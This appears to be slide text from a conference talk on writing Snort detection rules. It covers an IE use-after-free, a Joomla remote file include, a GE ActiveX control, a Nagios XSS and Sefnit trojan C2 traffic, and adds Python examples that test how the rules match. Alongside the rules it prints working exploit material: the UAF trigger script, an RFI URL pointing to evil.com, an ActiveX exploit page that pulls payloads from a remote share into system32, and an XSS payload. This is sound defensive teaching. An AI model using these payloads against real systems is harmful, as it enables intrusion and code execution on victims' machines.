This vulnerability is triggered by JavaScript that sets an onlosecapture() handler on the parent of two elements. This handler clears the DOM with document.write() when it is called. The JavaScript then calls setCapture() on the parent and the child element. This triggers the onlosecapture() handler, freeing a reference with document.write(). After the free, the invalid reference remains and causes a crash (or code execution) in MSHTML!CTreeNode::GetInterface.
Use-After-Free Trigger
function trigger() {
  var id_0 = document.createElement("sup");
  var id_1 = document.createElement("audio");
  document.body.appendChild(id_0);
  document.body.appendChild(id_1);
  id_1.applyElement(id_0);
  id_0.onlosecapture=function(e) { document.write(""); }
  id_0.setCapture();
  id_1.setCapture();
}
Use-After-Free Trigger
0:005> r
eax=41414141 ebx=6799799c ecx=679b6a14 edx=00000000 esi=00650d90 edi=021fcb34
eip=679b6b61 esp=021fcb0c ebp=021fcb20 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246
MSHTML!CTreeNode::GetInterface+0xd8:
679b6b61 8b08            mov     ecx,dword ptr [eax]  ds:0023:41414141=????????
Use-After-Free Detection
alert tcp $EXTERNAL_NET $FILE_DATA_PORTS -> $HOME_NET any (
    msg:"BROWSER-IE Microsoft Internet Explorer onlosecapture memory corruption attempt";
    flow:to_client,established;
    file_data;
    content:".applyElement"; nocase;
    content:".onlosecapture"; nocase; within:500; fast_pattern;
    content:".setCapture"; nocase; within:500;
    content:".setCapture"; nocase; within:500;
    pcre:"/\.applyElement\s*\(\s*(?P<var>\w+)\s*\).*?(?P=var)\.onlosecapture.*?(?P=var)\.setCapture/si";
    metadata:service ftp-data, service http, service imap, service pop3;
    reference:cve,2013-3893;
)
Use-After-Free Detection
alert tcp $EXTERNAL_NET any -> $SMTP_SERVERS 25 (
    msg:"BROWSER-IE Microsoft Internet Explorer onlosecapture memory corruption attempt";
    flow:to_server,established;
    file_data;
    content:".applyElement"; nocase;
    content:".onlosecapture"; nocase; within:500; fast_pattern;
    content:".setCapture"; nocase; within:500;
    content:".setCapture"; nocase; within:500;
    pcre:"/\.applyElement\s*\(\s*(?P<var>\w+)\s*\).*?(?P=var)\.onlosecapture.*?(?P=var)\.setCapture/si";
    metadata:service smtp;
    reference:cve,2013-3893;
)
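The content matches in these two rules only establish that the three API names occur near each other; the pcre does the real work, using a named group and backreference to require that the element passed to applyElement() is the same one that receives the onlosecapture handler and the setCapture() call. The Python below is an added example, not code from the slides or from Snort: it runs that regex (Python's re accepts PCRE's (?P<name>...) and (?P=name) unchanged) over the trigger from the slide, over a renamed copy of it, and over a constructed decoy that passes the content checks but not the pcre.

```python
# Added example (not from the slides, not Snort source): what the backreference
# pcre in the onlosecapture rules adds over the plain content matches.
import re

# The trigger from the slide, verbatim.
TRIGGER = """
function trigger() {
  var id_0 = document.createElement("sup");
  var id_1 = document.createElement("audio");
  document.body.appendChild(id_0);
  document.body.appendChild(id_1);
  id_1.applyElement(id_0);
  id_0.onlosecapture=function(e) { document.write(""); }
  id_0.setCapture();
  id_1.setCapture();
}
"""
# Constructed: the same trigger with the element variables renamed.
RENAMED = TRIGGER.replace("id_0", "target").replace("id_1", "holder")
# Constructed decoy: all three API names appear close together, but the
# onlosecapture handler is not installed on the element given to applyElement.
DECOY = """
var a = document.createElement("sup"), b = document.createElement("audio");
b.applyElement(a);
b.onlosecapture = function(e) { };
a.setCapture(); b.setCapture();
"""

# The rule's pcre with its /s and /i flags.
UAF_PCRE = re.compile(
    r"\.applyElement\s*\(\s*(?P<var>\w+)\s*\)"   # capture the argument name
    r".*?(?P=var)\.onlosecapture"                 # same name gets the handler
    r".*?(?P=var)\.setCapture",                   # same name gets setCapture()
    re.S | re.I)


def content_prefilter(js: str) -> bool:
    """The rule's content matches reduced to case-insensitive presence checks.
    (The rule also requires each match to start within 500 bytes of the
    previous one; all three samples here are far shorter than that.)"""
    low = js.lower()
    return all(t in low for t in (".applyelement", ".onlosecapture", ".setcapture"))


def uaf_rule_matches(js: str) -> bool:
    """Content prefilter followed by the pcre, as the rule evaluates them."""
    return content_prefilter(js) and UAF_PCRE.search(js) is not None


def captured_element(js: str):
    """The variable name the pcre tied the three calls to, or None."""
    m = UAF_PCRE.search(js)
    return m.group("var") if m else None


if __name__ == "__main__":
    for name, js in (("trigger", TRIGGER), ("renamed", RENAMED), ("decoy", DECOY)):
        print(f"{name:8} content={content_prefilter(js)} "
              f"pcre={UAF_PCRE.search(js) is not None} var={captured_element(js)}")
```

The decoy is the point: without the backreference, the rule would fire on any page that happens to use applyElement, onlosecapture and setCapture within 500 bytes of one another. The trade-off is coverage: (?P<var>\w+) only captures a bare identifier, so a trigger written as applyElement(nodes[0]) or applyElement(this.el) would not be tied together by this pcre.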
Remote File Include Overview
CVE-2008-5053
Remote file include vulnerability in Joomla Simple RSS Reader allows execution of arbitrary PHP code via the parameter mosConfig_live_site in administrator/components/com_rssreader/admin.rssreader.php:

include("$mosConfig_live_site/components/com_rssreader/about.html");

$mosConfig_live_site is obtained from the GET parameter of the same name sent to admin.rssreader.php.

Exploit:
http://site/joomlapath/administrator/components/com_rssreader/admin.rssreader.php?mosConfig_live_site=http://evil.com/
Remote File Include Detection
alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (
    msg:"SERVER-WEBAPP Joomla admin.rssreader.php remote file include attempt";
    flow:to_server,established;
    content:"admin.rssreader.php"; fast_pattern:only; http_uri;
    content:"mosConfig_live_site="; nocase; http_uri;
    pcre:"/[?&]mosConfig_live_site=[^&]*?(http|ftp)/Ui";
    metadata:service http;
    reference:cve,2008-5053;
    classtype:web-application-attack;
)
Browser Plugin Overview
CVE-2012-2516
GE Proficy Historian's KeyHelp.ocx ActiveX control adds HTML Help functionality to the Proficy enterprise data collection system. It can be instantiated in a web page using the <object> tag, for example:

<object id="ctrl" classid="clsid:45e66957-2932-432a-a156-31503df0a681">

Or using JavaScript:

obj = new ActiveXObject("KeyHelp.KeyScript")
Browser Plugin Overview
The API of this ActiveX object exposes several methods, including LaunchTriPane(), which has the following prototype:

void LaunchTriPane(System.string ChmFile)

LaunchTriPane uses ShellExecute to launch hh.exe with user controlled data as parameters:

> HH.EXE -decompile D:/destination-folder C:/test.chm

This can be abused to write arbitrary files. Code execution is possible by uploading a WMI .mof file.
Browser Plugin Disassembly
KeyHelp.ocx:
5D335165  CALL KeyHelp.5D31797F
5D33516A  JMP SHORT KeyHelp.5D33517D
5D33516C  PUSH 5
5D33516E  PUSH EDI
5D33516F  PUSH ESI                      ; malicious command line parameters - no validation
5D335170  PUSH KeyHelp.5D347950         ; ASCII "hh.exe"
5D335175  PUSH EDI
5D335176  PUSH EDI
5D335177  CALL SHELL32.ShellExecuteA    ; run hh.exe with malicious params
5D33517D  CMP ESI,EDI
5D33517F  JE SHORT KeyHelp.5D335187
5D335181  PUSH ESI
Browser Plugin Exploit
<html>
<body><script>
KeyScript = new ActiveXObject("KeyHelp.KeyScript");
ChmPayloadFile = "-decompile C:\\WINDOWS\\system32 " +
                 "\\\\172.16.211.11\\A5vTb1QLAqfifDoixwWS.chm";
ChmMofFile = "-decompile c:\\WINDOWS\\system32\\wbem\\mof " +
             "\\\\172.16.211.11\\A5vTb1QLAqfifQLQklKr.chm";
KeyScript.LaunchTriPane(ChmPayloadFile);
setTimeout('KeyScript.LaunchTriPane(ChmMofFile);', 3000);
</script></body>
</html>
Browser Plugin Detection
#
# <OBJECT> Detection
#
alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any (
    msg:"BROWSER-PLUGINS GE Proficy Historian KeyHelp ActiveX clsid access attempt";
    flow:to_client,established;
    file_data;
    content:"45E66957-2932-432A-A156-31503DF0A681"; fast_pattern:only;
    content:"LaunchTriPane"; nocase;
    metadata:policy security-ips drop, service http;
    reference:cve,2012-2516;
    classtype:attempted-user;
)
Browser Plugin Detection
#
# Javascript Detection
#
alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any (
    msg:"BROWSER-PLUGINS GE Proficy Historian KeyHelp ActiveX clsid access attempt";
    flow:to_client,established;
    file_data;
    content:"KeyHelp.KeyScript"; fast_pattern:only;
    content:"LaunchTriPane"; nocase;
    metadata:policy security-ips drop, service http;
    reference:cve,2012-2516;
    classtype:attempted-user;
)
Cross Site Scripting (XSS) Overview
OSVDB-89893
Cross-Site Scripting vulnerability in Nagios XI's Alert Cloud due to insufficient sanitization of the 'width' and 'height' parameters sent to the URI /includes/components/alertcloud/index.php

Exploit:
/nagiosxi/includes/components/alertcloud/index.php?height=4"}}; alert('XSS'); var aa={"A":{"B":"
Cross Site Scripting (XSS) Detection
alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (
    msg:"SERVER-WEBAPP Nagios XI alert cloud cross site scripting attempt";
    flow:to_server,established;
    content:"/includes/components/alertcloud/index.php"; fast_pattern:only; http_uri;
    pcre:"/[?&](height|width)=[^&]*?([\x22\x27\x3c\x3e\x28\x29]|script|onload|src)/Ui";
    metadata:service http;
    reference:url,osvdb.org/show/osvdb/89893;
    classtype:web-application-attack;
)
Malware Sample Overview
Win.Trojan.Sefnit
Upon execution Win.Trojan.Sefnit drops a service to %AppData%\Updater\updater.dll and starts it. When the service updater.dll starts, it attempts to read tasks from the configuration file %AppData%\Updater\~conf.dat. Initially the conf.dat file doesn't exist.

The sample obtains the disk volume serial number and appends it to the MachineGUID. This string is then encrypted. The sample takes 16 bytes of the encrypted value, converts them to a 32 character hex string and uses this string as a UUID sent in the initial request to C2:

GET /j/20a0b8237d5b084e46bd673e26d948bf/0001 HTTP/1.1
Host: axnlze.net
Accept: */*

The URI above has the following hardcoded format:
hxxp://<c2domain>/j/<uuid>/<version>
79. Malware Sample Disassembly
10015B27  PUSH 10112E28                  ; /Arg1 = UNICODE "c2.net/j/<uuid>/<version>"
10015B2C  LEA ECX,DWORD PTR SS:[EBP-4C]  ; |
10015B2F  CALL <_wcslen-copystr>         ; updater.10001BA4
10015B34  MOV BYTE PTR SS:[EBP-4],1
10015B38  MOV EDI,10112E14               ; UNICODE "<uuid>"
10015B3D  PUSH EDI                       ; /Arg1 => 10112E14
10015B3E  CALL <_wcslen>                 ; updater.100196E1
...
10015BBB  PUSH ESI                       ; UNICODE "<version>"
10015BBC  LEA ECX,DWORD PTR SS:[EBP-4C]
10015BBF  CALL <substr_loc>
10015BC4  MOV DWORD PTR SS:[EBP-1DC],EAX
10015BCA  PUSH ESI                       ; UNICODE "<version>"
10015BCB  CALL <_wcslen>
10015BD0  MOV DWORD PTR SS:[EBP-1EC],EAX
10015BD6  MOV EDI,10112E08               ; UNICODE "0001"
...
1005A043  PUSH 0                         ; /Arg4 = 00000000
1005A045  PUSH ECX                       ; |Arg3 = 008DAA60 ASCII "/j/20a0b8237d5b084e46bd673e26d948bf/0001"
1005A046  PUSH EBX                       ; |Arg2 = 1011B340 ASCII "GET"
1005A047  PUSH EDI                       ; |Arg1 = 008C9138 = NULL
1005A048  CALL 10058E00                  ; updater.10058E00
80. Malware Command Traffic Detection
#
# C2 request detection
#
# hardcoded urilen
urilen:40,norm;
# hardcoded uri pattern, begins with "/j/"
content:"/j/"; depth:3; http_uri;
# ends with "/0001"
content:"/0001"; distance:32; within:5; http_uri;
# no User-Agent in C2 request
content:!"User-Agent"; http_header;
# final verification of C2 URI pattern
pcre:"/^\x2fj\x2f[a-f0-9]{32}\x2f0001$/U";
81. Malware Command Traffic Detection
alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (
  msg:"MALWARE-CNC Win.Trojan.Sefnit variant outbound connection attempt";
  flow:to_server,established;
  urilen:40,norm;
  content:"/j/"; depth:3; http_uri;
  content:"/0001"; within:5; distance:32; http_uri;
  content:!"User-Agent"; http_header;
  pcre:"/^\x2fj\x2f[a-f0-9]{32}\x2f0001$/U";
  metadata:impact_flag red, service http;
  classtype:trojan-activity;
)
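The options in this rule are positional: depth anchors "/j/" to the start of the URI, distance skips the 32-byte UUID and within pins "/0001" to the five bytes that follow, which together account for the urilen of 40. The following added Python (not code from the talk, from the malware sample or from Snort) replays those checks against constructed HTTP requests so the arithmetic can be seen, and also shows the effect of the negated User-Agent content, which is case-sensitive as written because the rule has no nocase. The request texts, their names and the parse_request helper are constructed for this example; the header handling is a simplified stand-in for Snort's http_header buffer.

```python
import re
from urllib.parse import unquote

# The rule's pcre; /U selects the normalized URI buffer.
URI_RE = re.compile(r"^\x2fj\x2f[a-f0-9]{32}\x2f0001$")


def parse_request(raw: str):
    """Split a raw HTTP request into (method, normalized uri, header block)."""
    head = raw.split("\r\n\r\n", 1)[0]
    request_line, _, header_block = head.partition("\r\n")
    method, uri, _version = request_line.split(" ", 2)
    return method, unquote(uri), header_block   # urilen:40,norm compares the normalized URI


def failing_checks(raw: str) -> list:
    """Names of the rule options that reject this request; an empty list means the rule alerts.
    Snort stops at the first failing option; every option is evaluated here for illustration.
    Transport conditions (flow, $HTTP_PORTS) are not modelled."""
    _method, uri, headers = parse_request(raw)
    failed = []
    # urilen:40,norm -- the normalized URI must be exactly 40 bytes
    if len(uri) != 40:
        failed.append("urilen")
    # content:"/j/"; depth:3; http_uri -- a 3-byte pattern within the first 3 bytes = offset 0
    if uri[:3] != "/j/":
        failed.append("content:/j/")
    # content:"/0001"; distance:32; within:5 -- relative to the end of the previous match (3):
    # skip the 32-byte uuid, then the 5-byte pattern must fit in the next 5 bytes
    prev_end = 3
    if uri[prev_end + 32: prev_end + 32 + 5] != "/0001":
        failed.append("content:/0001")
    # content:!"User-Agent"; http_header -- negated and, without nocase, case-sensitive
    if "User-Agent" in headers:
        failed.append("content:!User-Agent")
    # pcre -- anchored, lowercase hex only, the final verification
    if URI_RE.match(uri) is None:
        failed.append("pcre")
    return failed


def sefnit_rule_matches(raw: str) -> bool:
    return not failing_checks(raw)


# Constructed requests (hypothetical names). The first reproduces the slide's beacon.
UUID = "20a0b8237d5b084e46bd673e26d948bf"
SEFNIT_BEACON = (
    f"GET /j/{UUID}/0001 HTTP/1.1\r\n"
    "Host: axnlze.net\r\n"
    "Accept: */*\r\n\r\n"
)
BROWSER_LIKE = (
    f"GET /j/{UUID}/0001 HTTP/1.1\r\n"
    "Host: axnlze.net\r\n"
    "User-Agent: Mozilla/5.0\r\n"
    "Accept: */*\r\n\r\n"
)
UPPERCASE_UUID = (
    f"GET /j/{UUID.upper()}/0001 HTTP/1.1\r\n"
    "Host: axnlze.net\r\n\r\n"
)
WRONG_VERSION = (
    f"GET /j/{UUID}/0002 HTTP/1.1\r\n"
    "Host: axnlze.net\r\n\r\n"
)
LOWERCASE_UA = (
    f"GET /j/{UUID}/0001 HTTP/1.1\r\n"
    "Host: axnlze.net\r\n"
    "user-agent: Mozilla/5.0\r\n\r\n"
)


if __name__ == "__main__":
    for name, req in [("beacon", SEFNIT_BEACON), ("browser", BROWSER_LIKE),
                      ("upper", UPPERCASE_UUID), ("version", WRONG_VERSION),
                      ("lower_ua", LOWERCASE_UA)]:
        print(name, "alert" if sefnit_rule_matches(req) else failing_checks(req))
```

The uppercase-UUID request passes every content option and is rejected only by the pcre, which is why the slide calls the pcre the final verification; the lowercase user-agent request is still alerted on, because the negated content as written only looks for the exact bytes "User-Agent".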
82. Call to Action
Related sessions:
- Introduction to Snort Rule Writing
- Detection Strategies with Snort [DevNet-1126]
Visit the World of Solutions for:
- Cisco Campus
- Walk in Labs
- Technical Solution Clinics
Meet the Engineer - available immediately after this talk.
